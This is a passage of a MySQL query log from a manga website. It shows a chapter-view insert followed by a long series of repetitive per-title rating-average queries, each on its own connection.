Quit 330653011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653011 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('338', '17113', '2409:40c2:1029:6098:8000::', 'mangacherri.com', '2026-02-26 03:29:28', '2026-02-26 03:29:28') 330653012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330653012 Quit 330653013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330653013 Quit 330653011 Quit 330653014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653014 Query select * FROM chapter_images where chapter_id = '17113' 330653015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330653015 Quit 330653016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330653016 Quit 330653017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330653017 Quit 330653018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330653018 Quit 330653019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330653019 Quit 330653020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330653020 Quit 330653021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330653021 Quit 330653022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330653022 Quit 330653023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330653023 Quit 330653024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330653024 Quit 330653025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330653025 Quit 330653026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330653026 Quit 330653027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330653027 Quit 330653028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330653028 Quit 330653029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330653029 Quit 330653030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330653030 Quit 330653031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330653031 Quit 330653032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330653032 Quit 330653033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330653033 Quit 330653034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330653034 Quit 330653035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330653035 Quit 330653036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330653036 Quit 330653037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330653037 Quit 330653038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330653038 Quit 330653039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330653039 Quit 330653040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330653040 Quit 330653041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330653041 Quit 330653042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330653042 Quit 330653043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330653043 Quit 330653044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330653044 Quit 330653045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330653045 Quit 330653046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330653046 Quit 330653047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330653047 Quit 330653048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330653048 Quit 330653049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330653049 Quit 330653050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330653050 Quit 330653051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330653051 Quit 330653052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330653052 Quit 330653053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330653053 Quit 330653054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330653054 Quit 330653055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330653055 Quit 330653056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330653056 Quit 330653057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330653057 Quit 330653058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330653058 Quit 330653059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330653059 Quit 330653060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330653060 Quit 330653061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330653061 Quit 330653062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330653062 Quit 330653063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330653063 Quit 330653064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330653064 Quit 330653065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330653065 Quit 330653066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330653066 Quit 330653067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330653067 Quit 330653068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330653068 Quit 330653069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330653069 Quit 330653070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330653070 Quit 330653071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330653071 Quit 330653072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330653072 Quit 330653073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330653073 Quit 330653074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330653074 Quit 330653075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330653075 Quit 330653076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330653076 Quit 330653077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330653077 Quit 330653078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330653078 Quit 330653079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330653079 Quit 330653080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330653080 Quit 330653081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330653081 Quit 330653082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330653082 Quit 330653083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330653083 Quit 330653084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330653084 Quit 330653085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330653085 Quit 330653086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330653086 Quit 330653087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330653087 Quit 330653088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330653088 Quit 330653089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330653089 Quit 330653090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330653090 Quit 330653091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330653091 Quit 330653092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330653092 Quit 330653093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330653093 Quit 330653094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330653094 Quit 330653095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330653095 Quit 330653096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330653096 Quit 330653097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330653097 Quit 330653098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330653098 Quit 330653099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330653099 Quit 330653100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330653100 Quit 330653101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330653101 Quit 330653102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330653102 Quit 330653103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330653103 Quit 330653104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330653104 Quit 330653105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330653105 Quit 330653106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330653106 Quit 330653107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330653107 Quit 330653108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330653108 Quit 330653109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330653109 Quit 330653110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330653110 Quit 330653111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330653111 Quit 330653112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330653112 Quit 330653113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330653113 Quit 330653114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330653114 Quit 330653115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330653115 Quit 330653116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330653116 Quit 330653117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330653117 Quit 330653118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330653118 Quit 330653119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330653119 Quit 330653120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330653120 Quit 330653121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330653121 Quit 330653122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330653122 Quit 330653123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330653123 Quit 330653124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330653124 Quit 330653125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330653125 Quit 330653126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330653126 Quit 330653127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330653127 Quit 330653128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330653128 Quit 330653129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330653129 Quit 330653130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330653130 Quit 330653131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330653131 Quit 330653132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330653132 Quit 330653133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330653133 Quit 330653134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330653134 Quit 330653135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330653135 Quit 330653136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330653136 Quit 330653137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330653137 Quit 330653138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330653138 Quit 330653139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330653139 Quit 330653140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330653140 Quit 330653141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330653141 Quit 330653142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330653142 Quit 330653143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330653143 Quit 330653144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330653144 Quit 330653145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330653145 Quit 330653146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330653146 Quit 330653147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330653147 Quit 330653148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330653148 Quit 330653149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330653149 Quit 330653150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330653150 Quit 330653151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330653151 Quit 330653152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330653152 Quit 330653153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330653153 Quit 330653154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330653154 Quit 330653155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330653155 Quit 330653156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330653156 Quit 330653157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330653157 Quit 330653158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330653158 Quit 330653159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330653159 Quit 330653160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330653160 Quit 330653161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330653161 Quit 330653162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330653162 Quit 330653163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = 